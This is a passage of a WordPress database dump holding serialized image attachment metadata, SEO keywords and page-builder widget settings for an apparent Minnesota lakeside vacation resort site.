5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3982-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3982-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3982-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3982-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1474718662\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00374812593703\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1016,499,'_wp_attached_file','2017/01/DSCN4078.jpg'),(1017,499,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN4078.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4078-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4078-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4078-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4078-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4078-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4078-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4078-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4078-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4078-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4078-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4078-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4078-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479634791\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0074294205052\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1019,84,'_yoast_wpseo_focuskw_text_input','hunting, Lake Christina'),(1020,84,'_yoast_wpseo_focuskw','hunting, Lake Christina'),(1021,84,'_yoast_wpseo_linkdex','28'),(1022,64,'_yoast_wpseo_focuskw_text_input','Biking'),(1023,64,'_yoast_wpseo_focuskw','Biking'),(1024,64,'_yoast_wpseo_linkdex','33'),(1025,512,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(1026,2,'_yoast_wpseo_focuskw_text_input','resort Minnesota vacation Ashby walleye Pelican lake'),(1027,2,'_yoast_wpseo_focuskw','resort Minnesota vacation Ashby walleye Pelican lake'),(1028,2,'_yoast_wpseo_linkdex','31'),(1029,12,'_yoast_wpseo_content_score','30'),(1030,12,'_yoast_wpseo_focuskw_text_input','vacation, walleye, campgrounds, cabin'),(1031,12,'_yoast_wpseo_focuskw','vacation, walleye, campgrounds, cabin'),(1032,12,'_yoast_wpseo_linkdex','36'),(1033,61,'_yoast_wpseo_focuskw_text_input','pontoon, fishing, paddle boat, kayaks'),(1034,61,'_yoast_wpseo_focuskw','pontoon, fishing, paddle boat, kayaks'),(1035,61,'_yoast_wpseo_linkdex','36'),(1036,81,'_yoast_wpseo_focuskw_text_input','walleye, fishing'),(1037,81,'_yoast_wpseo_focuskw','walleye, fishing'),(1038,81,'_yoast_wpseo_linkdex','28'),(1039,539,'_wp_attached_file','2016/03/DSCN41971.jpg'),(1040,539,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:21:\"2016/03/DSCN41971.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN41971-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"DSCN41971-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSCN41971-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"DSCN41971-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN41971-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN41971-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN41971-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"DSCN41971-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"DSCN41971-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"DSCN41971-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"DSCN41971-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"DSCN41971-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487157719\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0155763239875\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1041,540,'_wp_attached_file','2016/03/DSCN42001.jpg'),(1042,540,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:21:\"2016/03/DSCN42001.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN42001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"DSCN42001-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSCN42001-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"DSCN42001-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN42001-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN42001-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN42001-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"DSCN42001-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"DSCN42001-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"DSCN42001-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"DSCN42001-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"DSCN42001-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487157788\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:14:\"0.014880952381\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1043,541,'_wp_attached_file','2016/03/DSCN42011.jpg'),(1044,541,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:21:\"2016/03/DSCN42011.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN42011-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"DSCN42011-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSCN42011-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"DSCN42011-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN42011-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN42011-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN42011-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"DSCN42011-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"DSCN42011-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"DSCN42011-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"DSCN42011-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"DSCN42011-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487157805\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0289855072464\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1045,542,'_wp_attached_file','2016/03/DSCN42041.jpg'),(1046,542,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:21:\"2016/03/DSCN42041.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN42041-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"DSCN42041-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSCN42041-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"DSCN42041-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN42041-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"DSCN42041-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"DSCN42041-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"DSCN42041-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"DSCN42041-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"DSCN42041-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"DSCN42041-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"DSCN42041-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487157834\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"223\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1049,546,'_wp_attached_file','2017/02/DSCN2615.jpg'),(1050,546,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/02/DSCN2615.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2615-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2615-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2615-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2615-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2615-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2615-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2615-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2615-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2615-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2615-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2615-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2615-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1433149364\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"5.9\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1051,547,'_wp_attached_file','2017/02/DSCN2633.jpg'),(1052,547,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/02/DSCN2633.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2633-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2633-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2633-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2633-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2633-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2633-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2633-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2633-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2633-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2633-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2633-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2633-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX 